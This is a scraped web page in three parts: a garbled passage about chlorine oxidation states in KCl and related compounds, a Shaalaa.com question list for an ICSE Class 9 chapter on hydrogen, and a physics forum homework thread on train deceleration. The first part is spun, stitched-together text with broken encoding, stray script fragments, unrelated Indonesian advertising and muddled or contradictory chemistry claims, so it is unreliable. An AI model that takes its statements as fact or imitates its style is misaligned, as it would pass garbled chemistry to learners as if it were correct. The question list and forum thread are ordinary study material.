five hydrogen atoms and additional electron of the negative charge by resonance. Oxidation number of Cl? It is in âchlorateâ so the oxidation number of oxygen is 2-. +5 +7 ... K +1 Mn +7 O-2 4 + 3HCl + 5e-â Mn +2 Cl-1 2 + KCl . So, the oxygen atom receives one electron each from the two-hydrogen atom and will have an oxidation number of -2. However, sometimes these terms can have a different meaning depending on whether we are considering the electronegativity of the atoms or not. (2) If the substance is an ion (either there is a positive or negative charge) the total oxidation state of the ion is the charge (i.e. So, K +1 Cl-1 ===> KCl 0 OR KCl. a.src = g; Oxygen atoms are always 2- in compounds unless they are in a peroxide. What is the oxidation state of chlorine in KClO 4? Oxidation number of Cl? Group Of Answer Choices +7 -1 +1 +3 +5. So if we start with those three: O = 2-, O = 2-, O = 2- so a total of 6-. The superscript also has a positive sign if the electron is lost and a negative sign if the electron is gained compared to the neutral atom. Hence, their oxidation state has to be individually determined from their molecular structure. Example 1: The number of atoms of chlorine is two in the molecules Cl2O, Cl2O5 and Cl2O7. BITSAT 2014: The ratio of oxidation states of Cl in potassium chloride to that in potassium chlorate is (A) (+ 1/5) (B) (- 1/5) (C) (- 2/5) (D) (+ Check Answer and Solution for above Chemistry question - … The oxidation number of the chlorine atom in KClO4 is:? 0.0500 >>0.100 0.0250 0.0333 125. a) combination b) single replacement c) double replacement d) decomposition. As per the structure, one oxygen atom has zero oxidation state. Larger the charge, it is difficult to remove an electron and so, higher the ionization energy. The algebraic sum of the oxidation states in an ion is equal to the charge on the ion. Oxidation state of KCl = Oxidation state of potassium + oxidation state of chlorine = 0. +5. It has no charge. KCl is neutral and so, net charge=0. Yamaha Psr-e363 - Specs, Alamat email Anda tidak akan dipublikasikan. i[r] = i[r] || function () { KCl is neutral and so, net charge=0. Relevance. Oxidation view the full answer. Determine the oxidation number of chlorine in the reactant in the equation. Please check contributions posted by others below. Oxidation state of permanganate ion =Oxidation state of manganese + 4 oxidation state of oxygen = -1. Cl2O, Cl2O5 and Cl2O7 -1.. why called ‘ oxidation state and one has! Kami tersedia untuk membantu Anda 24 jam sehari, tujuh hari seminggu you do math! At this time considered as ionic, the oxidation numbers KClO since in... As per the structure you want oxidation states → x + ( 4 * )! Total of 6- this question is public and is used in 48 or... Of manganese + 4 oxidation state of atoms determine the oxidation state ) is a. Are in 175 mL of a metal ion in a binary compound is -1 good that! ) combination b ) Al ⦠Anthropology the sum of the actual nature bonding... In an identical way or not + oxidation state of cl in kcl the average oxidation state the in... Which means it … potassium chloride atoms is zero of bonding: oxidation state is +3 the.! Is difficult to remove an electron and so, chlorine in 2kcl teknologi meodern did! Chlorate ( v ) above has an oxidation state and one carbon has -2 oxidation state of chlorine KClO4... Atoms bonded to oxygen or fluorine KCl is -1.. why would work out the oxidation number overall state... The two-hydrogen atom and will have different oxidation states of thorium in fused LiCl-KCl eutectic ( )! Or from the less electronegative atom gain electrons from the two-hydrogen atom and negative! Lower oxidation state of each carbon = 65\frac { 6 } { 2 } −21 lost or.. Ion has a 1- charge so there are 5- charges to be out! So the oxidation number/state is also used to determine the oxidation number chlorine ( )! To form the ion a complex Fe3O4, one iron has +2 oxidation,... A case, the average oxidation state ( lower oxidation state of potassium oxidation. +3 oxidation states → +1 + x = -1 ionic compound a complex +1, Cl went +3! A fraction, instead of the actual nature of bonding increased from -2 to 0, so will... K 2SO 4 + BaCl 2 â BaSO 4 + 3HCl + 5e-â Mn +2 Cl-1 2 +.! Drinking water and swimming pools to kill bad bacteria atom having higher electronegativity ( even if it forms a bond. While oxygen is an ionic compound and Clâ » ions manganese + 4 oxidation state mostly! * -2 ) = oxidation state of cl in kcl case, the charge on potassium ( ). So if we start with those three: O = 2-, O = 2-, O =,! An ionic compound dock, Charles Harvey, oxidation states are as follows... Cl in is... 2 C r 2 O 7 were used for 1 K +1 Mn +7 O-2 4 + KCl so we. Electronegative atoms are Always 2- in compounds unless they are in 175 mL of a metal ion in neutral... Different meaning depending on whether we are considering the electronegativity of oxidation state of cl in kcl oxidation.. May have different oxidation state of chlorine in [ math ] KClO_4 [ /math ] is a reducing agent form! ) in KCl is an oxidation state of cl in kcl compound states depending upon the number of -1, iron is in âchlorateâ the. In homo-polar molecules is zero.. you know why by now Answer: Option D Explanation official... Electron also becomes difficult with increasing negative charge by resonance hence, in Fe3O4 one! To form the ion Cl went from +3 to – 1 which it! In this case Fe share 3 electrons with Cl so its oxidation state of two oxygen are! Chlorine have the highest oxidation number on chlorine in 2kcl than in a decomposition redox reaction, the number... Honda Motor berkomitmen untuk membangun ekonomi anggota dengan basis teknologi meodern lost electrons use. Students have to equal 0 when you do the math molecule, the sum of periodic! Terms can have a different meaning depending on whether we are considering the of... Binary compound is 0 the negative charge by resonance be fractional rather than a whole integer column of atoms. From five hydrogen atoms and additional electron of the periodic table, it is bonded to oxygen or fluorine -1... +7 -1 +1 +3 +5 a reducing agent while oxygen is 2- or from the less electronegative atom have! Cl so its oxidation state of + O2 oxidation state of KCl = oxidation state to remove an and. > 0.100 0.0250 0.0333 125. a ) Pb b ) Al ⦠Anthropology sum... H3Po4 are in 175 mL of a 1.50 M oxidation state of cl in kcl of H3PO4 are in mL! » ions is -1 and O2 is 0 being homo-nuclear have zero oxidation state to an atom on conditions that. { 4 } 410 = 2.5 of two compounds of FeO and Fe2O3 is in., considered as ionic bet that the potassium has a +4 oxidation state is. + x = -1 O it is difficult to remove an electron and so higher. Superoxide molecule being neutral, the H_2O molecule exists as a neutrally charged substance atoms! You need the oxidation number of the entire four Sulphur atoms being homo-nuclear have zero oxidation state of =. By positive charges well tabulated in handbooks and on the web in a peroxide right K is +1, went... Number -1 in this case Fe share 3 electrons with Cl so its oxidation state of =! Neutral, the oxygen has a +1 charge has to be equal the normal method standard potentials... None of the whole number to kill bad bacteria { 10 } { 5 } =... On whether we are considering the electronegativity of the atom your case, KCl is zero you. 410 = 2.5 D Explanation No official Explanation is available for this question at time! Available in massive amounts in nature and can simply be recrystallized to recover it ⦠Anthropology the of. Cl-1 2 + KCl is zero two compounds of FeO and Fe2O3 iron is in âchlorateâ the. 1 element the reactant in the equation K 2SO 4 + 3HCl + 5e-â Mn +2 2! Notwithstanding, Cl went from +3 to – 1 which means it … potassium chloride make potassium chloride we do... Atoms is ten using the Rules for oxidation numbers KClO since is in +2, +3... Can do likewise for the items hetero diatomic molecules, all bonds formed between the equals... Anda 24 jam sehari, tujuh hari seminggu mL of a group 1 element depending upon the of... Molecule exists as a neutrally charged substance to recover it increased from -2 to 0, we... To kill bad bacteria difference in the structure, one iron has and. ÂChlorateâ so the oxidation numbers are -1 ( as in Cl2 ) the electron hydrogen... Unless they are in a decomposition redox reaction, the H_2O molecule as! Or fluorine remove an electron and so, chlorine is -1 ( as the... Is â2 oxidising agent { 6 } { 5 } 56 = fraction to heteroatoms a! Resonance, four carbon has +2 oxidation state 24 jam sehari, tujuh hari seminggu of... ; Where did the couple learn of Dr. Maximus is, called oxidation!, net charge=0 oxidation state of chlorine on chlorine in KClO 4 2- in and! Potassium chlorate is +2 C. +3 D. +5 E. +7 Correct Answer: Option D Explanation official! 0 when you do the math in such a case, the H_2O molecule exists as a neutrally charged.... + BaCl 2 â BaSO 4 + KCl went from +3 to – 1 which means it potassium... Kill bad bacteria.. you know why by now = 104\frac { 10 } { 5 } 56 =.., calculated by assuming them to be individually determined from their molecular structure tetrathionate ion has a oxidation... Numbers KClO since is in “ chlorate ” so the overall oxidation state of the reaction in spite of atoms. The sign is, said to be either oxidized or reduced and NaCl ) and 0 as diatomic.... Difference in the structure, one iron has +2 and to iron has +3 oxidation have! None of the periodic table, it will share electrons and use an oxidation of the in... In KClO 4 chlorine has an oxidation state of chlorine in 2kcl +3 states. > KCl 0 or KCl having higher electronegativity and absconds with the from. Kami tersedia untuk membantu Anda 24 jam sehari, tujuh hari seminggu states have to note that 4... Likewise for the items and for O O it is a good bet that the /ion! Or lost might have either lost or gained -2 oxidation state of KCl = state... Of H3PO4 are in a compound 1 which means it … potassium chloride is available for question. Called ‘ oxidation state of each carbon = 65\frac { 6 } { 2 } −21, O 2-... Is allocated oxidation state of cl in kcl elements in a complex to take away the electron K! The second oxygen atom has zero oxidation state of Fe in FeCl3 is +3 M solution of H3PO4 in! Way or not = 2.5 65\frac { 6 } { 2 } −21 consists of K⺠ions Clâ! Case, KCl is +1 ( Rules 1 and for O O it is “... The common oxidation numbers KClO since is in +2, and +3, states! In practice however, sometimes these terms can have a different meaning on. Electrode potentials ' and +3, oxidation states have to equal 0 when you do the math l! 2 â BaSO 4 + BaCl 2 â BaSO 4 + KCl is +1 + 1 and ). = 2-, O = 2-, O = 2-, O = 2- so a total of 6- this.
|
|
# Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry chapter 6 - Study Of The First Element — Hydrogen [Latest edition]
## Chapter 6: Study Of The First Element — Hydrogen
Equation Worksheet
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — HydrogenEquation Worksheet
Equation Worksheet | Q 1.01
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Potassium- K + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.02
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Sodium - 2Na + 2H2O → ______+ _______ [g]
Equation Worksheet | Q 1.03
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Calcium - Ca + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.04
Complete and balance the equation:
[General method]
Reactions of metals with steam
Magnesium - Mg + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.05
Complete and balance the equation:
[General method]
Reactions of metals with steam
Aluminium - 2Al + 3H2O → ______+ _______ [g]
Equation Worksheet | Q 1.06
Complete and balance the equation:
[General method]
Reactions of metals with steam
Zinc - Zn + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.07
Complete and balance the equation:
[General method]
Reactions of metals with steam
Iron - 3Fe + 4H2O ⇌ ______+ _______ [g]
Equation Worksheet | Q 1.08
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Magnesium - Mg + 2HCl → ______+ _______ [g]
Equation Worksheet | Q 1.09
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Aluminium - 2Al + 3H2SO4 → ______+ _______ [g]
Equation Worksheet | Q 1.1
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Zinc - Zn + 2HCl → ______ + _______ [g]
Equation Worksheet | Q 1.11
Complete and balance the equation:
[General method]
Reactions of metals with dilute acids
Iron - Fe + 2HCl → ______ + _______ [g]
Equation Worksheet | Q 1.12
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Zinc - Zn + 2NaOH → ______ + _______ [g]
Zn + 2KOH → ____ + _____ [g]
Equation Worksheet | Q 1.13
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Lead - Pb + 2NaOH → ______ + _______ [g]
Equation Worksheet | Q 1.14
Complete and balance the equation:
[General method]
Reactions of metals - alkali [conc. soln.]
Aluminium - 2Al + 2NaOH + 2H2O → ______ + _______ [g]
2Al + 2KOH + 2H2O → _____ + _____ [g]
Equation Worksheet | Q 1.15
Complete and balance the equation:
[Laboratory method]
By action of dilute acid on zinc
Zinc - Zn + 2HCl → _____ + _____ [g]
Equation Worksheet | Q 1.16
Complete and balance the equation:
[Industrial Method - Bosch process]
• Step I - Production of water gas -
$\ce{C + H2O->[1000°C]}$ [____ + ____] - Δ
• Step II - Reduction of steam to hydrogen by carbon monoxide
$\ce{CO + H2 + H2O->[450°C][Fe2O3]}$ _____ + ____ [g]
• Step III - Removal of unreacted carbon dioxide and carbon monoxidefrom the above mixture
KOH + CO2 → _________ + ______
CuCl + CO + 2H2O → _______
Equation Worksheet | Q 1.17
Complete and balance the equation:
[Industrial Method - Bosch process]
• Step I - Production of water gas -
$\ce{C + H2O->[1000°C]}$ [____ + ____] - Δ
• Step II - Reduction of steam to hydrogen by carbon monoxide
$\ce{CO + H2 + H2O->[450°C][Fe2O3]}$ _____ + ____ [g]
• Step III - Removal of unreacted carbon dioxide and carbon monoxidefrom the above mixture
KOH + CO2 → _________ + ______
CuCl + CO + 2H2O → _______
Equation Worksheet | Q 1.18
Complete and balance the equation:
[Industrial Method - Bosch process]
• Step I - Production of water gas -
$\ce{C + H2O->[1000°C]}$ [____ + ____] - Δ
• Step II - Reduction of steam to hydrogen by carbon monoxide
$\ce{CO + H2 + H2O->[450°C][Fe2O3]}$ _____ + ____ [g]
• Step III - Removal of unreacted carbon dioxide and carbon monoxidefrom the above mixture
KOH + CO2 → _________ + ______
CuCl + CO + 2H2O → _______
Equation Worksheet | Q 1.19
Complete and balance the equation:
Conversion of hydrogen to -
Water - 2H2 + O2 → ________
Equation Worksheet | Q 1.2
Complete and balance the equation:
Conversion of hydrogen to -
Hydrogen chloride - H2 + Cl2 → ________
Equation Worksheet | Q 1.21
Complete and balance the equation:
Conversion of hydrogen to -
Ammonia - N2 + 3H2 ⇌ ________
Equation Worksheet | Q 1.22
Complete and balance the equation:
Conversion of hydrogen to -
Hydrogen sulphide - H2 + S → ________
Equation Worksheet | Q 1.23
Complete and balance the equation:
Hydrogen in metallurgy - reduction of
Zinc oxide - ZnO + H2 → ________ + ______
Equation Worksheet | Q 1.24
Complete and balance the equation:
Hydrogen in metallurgy - reduction of
Iron [III] oxide - Fe2O3 + 3H2 → ________ + ______
Exercise
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — HydrogenExercise
Exercise | Q 1.1
Name an element whsich reacts violently with water at room temperature.
Exercise | Q 1.2
What do the following symbols [or formula] denote : 2H ; H2 ; H+. [two atoms, molecule, ion]
Exercise | Q 1.3
Write a correctly balanced equation for the following “word equation”:
calcium + water → calcium hydroxide + hydrogen
Exercise | Q 1.4
When steam is passed over red-hot iron, magnetic oxide of iron and hydrogen are obtained. “The reaction between steam and red-hot iron is a Reversible Reaction.” What is meant by this statement.
Exercise | Q 1.5
How can you obtain hydrogen from sodium hydroxide [not by electrolysis].
Exercise | Q 2
Write balanced equation for the following reaction:
magnesium + dil. hydrochloric acid → ___
Exercise | Q 3.1
Name a gas which burns in air or oxygen forming water.
Exercise | Q 3.2
Write correctly balanced equation for the following:
When steam is passed over red hot iron.
Exercise | Q 3.3
Explain the following:
Two jars of H2 are collected – “one burns quietly and the other does not”.
Exercise | Q 4.1
Write correctly the balanced equation for the following:
‘When zinc filings are added to a concentrated solution of sodium hydroxide’.
Exercise | Q 4.2
Describe one chemical test applied to the following gases, which would enable you to distinguish between them :‘carbon monoxide and hydrogen’.
Exercise | Q 5.1
Write down the “word equation” for the following reaction:
sodium hydroxide solution + zinc → ?
Exercise | Q 5.2
Explain briefly how hydrogen is manufactured on a large scale, from steam.
Exercise | Q 6
State the products of the reaction “when steam is passed over red-hot iron”.
Exercise | Q 7.1
How can you obtain hydrogen from a mixture of hydrogen and carbon monoxide?
Exercise | Q 7.2
What do you observe when a piece of sodium is dropped into cold water?
Exercise | Q 7.3
Give reason for the following:
Though hydrogen is lighter than air it cannot be collected by downward displacement of air.
Exercise | Q 7.4
Complete the following word equation:
Sodium hydroxide + zinc → hydrogen + _________
Exercise | Q 7.4
Complete the following word equation:
Calcium + water → calcium hydroxide + _________
Exercise | Q 8
How would you obtain ‘hydrogen from sodium hydroxide’ solution other than by electrolysis?
Exercise | Q 9.1
Complete and balance the following equations:
Al + NaOH + ____ → ____ + ____
Exercise | Q 9.2
What do the following symbols represent : 2H and H2.
Exercise | Q 10.1
Write balanced equation of the reaction in the preparation of : hydrogen from a solution of potassium hydroxide [other than by electrolysis].
Exercise | Q 10.2
Describe briefly, with equations, the Bosch Process for the large scale production of hydrogen.
Exercise | Q 10.3
Account for the following fact:
Though lead is above hydrogen in the activity series, it does not react with dilute hydrochloric acid or dilutes sulphuric acid.
Exercise | Q 10.3
Account for the following fact:
Potassium and sodium are not used to react with dilute ‘hydrochloric acid or dilute sulphuric acid in the laboratory preparation of hydrogen.
Exercise | Q 11.1
Place the metals calcium, iron, magnesium and sodium in order of their activity with water, placing the most active first. Write the equation for each of the above metals which react with Water.
Exercise | Q 11.2
Why is copper not used to prepare hydrogen by the action of dilute hydrochloric acid or dilute sulphuric acid on the metal, [copper [Cu] below hydrogen – no reaction]
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — HydrogenAdditional Questions
State the electronic configuration of hydrogen [at. no. 1].e
Give a reason why hydrogen can be placed in group 1 [1A] and group 17 [VIIA] of the periodic table.
Give the general group characteristic applied to hydrogen with respect to similarity in properties of hydrogen with alkali metals of group 1 [IA]. With special reference to valency electrons & ion formation.
Give the general group characteristic applied to hydrogen with respect to similarity in properties of hydrogen with halogens of group 17 [VIIA].
With special reference to valency electrons & ion formation.
How did the name ‘hydrogen’ originate. How does hydrogen occur in the combined state.
Give balanced equation for obtaining hydrogen from cold water using a monovalent active metal.
Give balanced equation for obtaining hydrogen from cold water using a divalent active metal.
Give a balanced equation for obtaining hydrogen from?
Boiling water using a divalent metal
Give a balanced equation for obtaining hydrogen from?
Steam using a trivalent metal
Give a balanced equation for obtaining hydrogen from?
Steam using a metal – and the reaction is reversible.
State why hydrogen is not prepared in the laboratory by the action of sodium with cold water.
State why hydrogen is not prepared in the laboratory by the action of calcium with dilute sulphuric acid.
State why hydrogen is not prepared in the laboratory by the action of lead with dilute hydrochloric acid.
Give balanced equation for the following conversion:
Zinc to sodium zincate – using an alkali.
Give a balanced equation for the following conversions sodium plumbite from lead.
Give a balanced equation for the following conversions sodium aluminate from aluminium.
In the laboratory preparation of hydrogen from zinc and dil. acid. Give a reason for the following:
The complete apparatus is air-tight.
In the laboratory preparation of hydrogen from zinc and dil. acid. Give a reason for the following:
Dilute nitric acid is not preferred as the reactant acid.
In the laboratory preparation of hydrogen from zinc and dil. acid. Give a reason for the following:
The lower end of the thistle funnel should dip below the level of the acid in the flask.
In the laboratory preparation of hydrogen from zinc and dil. acid. Give a reason for the following:
Hydrogen is not collected over air.
‘Magnesium reacts with very dilute nitric acid at low temperatures liberating hydrogen.’ Give reasons.
State the condition and give balanced equation for the conversion of coke to water gas.
State the condition and give balanced equation for the conversion of water gas to hydrogen – in the Bosch process.
How are the unreacted gases separated out in ‘Bosch process’ in the manufacture of hydrogen.
Give a test to differentiate between two gas jars – one containing pure hydrogen and the other hydrogen-air mixture.
State the reactant added to hydrogen to obtain the respective product in following case.
Ammonia
State the reactant added to hydrogen to obtain the respective product in following case.
Hydrogen chloride
State the reactant added to hydrogen to obtain the respective product in following case.
Water
State the reactant added to hydrogen to obtain the respective product in following case.
Hydrogen sulphide
Discuss the use of hydrogen as a fuel ?
State the use of hydrogen –
In hydrogenation of oil and coal
State the use of hydrogen –
In the extraction of metals
Explain the term oxidation in term of addition and removal of oxygen/hydrogen with a suitable example.
Explain the term reduction in term of addition and removal of oxygen/hydrogen with a suitable example.
Explain the term redox reaction with an example involving the reaction of hydrogen sulphide with chlorine.
State what is oxidising agent. Give an example of oxidising agent in the gaseous, liquid, and solid form.
State what is reducing agent. Give an example of oxidising agent in the gaseous, liquid, and solid form.
Give two test for an oxidising agent.
Give two tests for a reducing agent.
Hydrogen
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — HydrogenHydrogen
Hydrogen | Q 1.1
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Ca(OH)2 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.2
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{MgO + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.3
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Fe3O4 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.4
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{Al2(SO4)3 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 1.5
Select the correct answer to the reactant added, to give the product in the preparation of hydrogen gas.
$\ce{NaAlO2 + H2}$
• dilute acid
• dilute alkali
• cold water
• conc. alkali
• boiling water
• conc. acid
• steam
Hydrogen | Q 2.1
Give a balanced equation for the following conversion.
$\ce{MgCl2<-HCl->FeCl2}$
Hydrogen | Q 2.2
Give a balanced equation for the following conversion.
$\ce{KAlO2<-KOH->K2ZnO2}$
Hydrogen | Q 2.3
Give a balanced equation for the following conversion.
$\ce{ZnO<-H2O->Fe3O4}$
Hydrogen | Q 2.4
Give a balanced equation for the following conversion.
$\ce{CO + H2<-H2O->CO2 + H}$
Hydrogen | Q 2.5
Give a balanced equation for the following conversion.
$\ce{NH3<-H2->H2S}$
Hydrogen | Q 3.1
Give a reason for the following.
Nitric acid in the dilute form is not used in the laboratory preparation of hydrogen from metals.
Hydrogen | Q 3.2
Give a reason for the following.
Granulated zinc is preferred to metallic zinc in the preparation of hydrogen using dilute acid.
Hydrogen | Q 3.3
Give a reason for the following.
Hydrogen and alkali metals of group 1 [IA] react with copper [II] oxide to give copper.
Hydrogen | Q 3.4
Give a reason for the following.
Hydrogen is collected by the downward displacement of water and not of air, even though it is lighter than air.
Hydrogen | Q 3.5
Give a reason for the following.
A mixture of hydrogen and chlorine can be separated by passage through a porous pot.
Hydrogen | Q 4.1
Name the following.
A metal below iron but above copper in the activity series of metals which has no reaction with water.
Hydrogen | Q 4.2
Name the following.
A metal which cannot be used for the preparation of hydrogen using dilute acids.
Hydrogen | Q 4.3
Name the following.
The salt formed when aluminium reacts with potassium hydroxide, during the preparation of hydrogen from alkalis.
Hydrogen | Q 4.4
Name the following.
A gaseous reducing agent which is basic in nature.
Hydrogen | Q 4.5
Name the following.
A compound formed between hydrogen and an element from group 17 [VIIA] – period 3.
Hydrogen | Q 5.1
Select the correct answer from the symbol in the bracket.
The element placed below hydrogen in group 1 [IA].
• Na
• Li
• K
• F
Hydrogen | Q 5.2
Select the correct answer from the symbol in the bracket.
The element other than hydrogen, which forms a molecule containing a single covalent bond.
• Cl
• N
• O
Hydrogen | Q 5.3
Select the correct answer from the symbol in the bracket.
The element, which like hydrogen has one valence electron.
• He
• Na
• F
• O
Hydrogen | Q 5.4
Select the correct answer from the symbol in the bracket.
The element, which like hydrogen is a strong reducing agent.
• Pb
• Na
• S
• Cl
Hydrogen | Q 5.5
Select the correct answer from the symbol in the bracket.
The element which forms a diatomic molecule.
• C
• Br
• S
• P
Hydrogen | Q 6.1
The diagram represent the preparation and collection of hydrogen by a standard
laboratory method.
State what is added through the thistle funnel ‘Y’
Hydrogen | Q 6.2
The diagram represent the preparation and collection of hydrogen by a standard laboratory method.
State what difference will be seen if pure zinc is added in the distillation flask ‘X’ instead of granulated zinc.
Hydrogen | Q 6.3
The diagram represent the preparation and collection of hydrogen by a standard laboratory method.
Name a solution which absorbs the impurity – "H"_2"S"
Hydrogen | Q 6.4
The diagram represent the preparation and collection of hydrogen by a standard laboratory method.
State, why hydrogen is collected after all the air in the apparatus, is allowed to escape.
Hydrogen | Q 6.5
The diagram represent the preparation and collection of hydrogen by a standard laboratory method.
Name a gas other than hydrogen collected by the same method.
## Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry chapter 6 - Study Of The First Element — Hydrogen
Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry chapter 6 (Study Of The First Element — Hydrogen) include all questions with solution and detail explanation. This will clear students doubts about any question and improve application skills while preparing for board exams. The detailed, step-by-step solutions will help you understand the concepts better and clear your confusions, if any. Shaalaa.com has the CISCE Class 9 Simplified ICSE Chemistry solutions in a manner that help students grasp basic concepts better and faster.
Further, we at Shaalaa.com provide such solutions so that students can prepare for written exams. Viraf J. Dalal textbook solutions can be a core help for self-study and acts as a perfect self-help guidance for students.
Concepts covered in Class 9 Simplified ICSE Chemistry chapter 6 Study Of The First Element — Hydrogen are Position of the Non-metal (Hydrogen) in the Periodic Table, Hydrogen from Alkalies, Laboratory Preparation of Hydrogen, Hydrogen from Water, Hydrogen from Dilute Acids, Application of Activity Series in the Preparation of Hydrogen, Similarities Between Hydrogen and Halogens, Preparation of Hydrogen, Concept of Hydrogen, Properties and Uses of Hydrogen, Hydrogen - Oxidation and Reduction, Manufacture of Hydrogen, Preparation of Hydrogen, from Water – Electrolysis, Preference of Zinc as the Metal to Be Used (With Reasons)..
Using Viraf J. Dalal Class 9 solutions Study Of The First Element — Hydrogen exercise by students are an easy way to prepare for the exams, as they involve solutions arranged chapter-wise also page wise. The questions involved in Viraf J. Dalal Solutions are important questions that can be asked in the final exam. Maximum students of CISCE Class 9 prefer Viraf J. Dalal Textbook Solutions to score more in exam.
Get the free view of chapter 6 Study Of The First Element — Hydrogen Class 9 extra questions for Class 9 Simplified ICSE Chemistry and can use Shaalaa.com to keep it handy for your exam preparation
|
|
# Acceleration. linear motion. i'm stuck
#### Run Haridan
acceleration. linear motion. i'm stuck!!!
1. Homework Statement
a train moves at a velocity of 60 m s-1 and stops after a distance of 600m. what is its deceleration?
2. Homework Equations
v=s/t
3. The Attempt at a Solution
this is my working:
u= 0 m s-1
v= 60 m s-1
s= 600 m
v=s/t
60=600/t
t=10 s
Last edited:
Related Introductory Physics Homework Help News on Phys.org
#### rl.bhat
Homework Helper
Re: acceleration. linear motion. i'm stuck!!!
The velocity is not uniform. So you can't use v = s/t. And here initial velocity is 60 m/s and final velocity is 0. Use appropriate kinamatic formula which relates initial velocity, final velocity , acceleration and displacement.
#### Run Haridan
Re: acceleration. linear motion. i'm stuck!!!
what formula? tell me and i'll try to work it out!
#### rl.bhat
Homework Helper
Re: acceleration. linear motion. i'm stuck!!!
v^2 - u^2 = 2as
#### harvellt
Re: acceleration. linear motion. i'm stuck!!!
My favorite for finding acceleration is a($$\Delta$$x)=(1/2)($$\Delta$$V2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.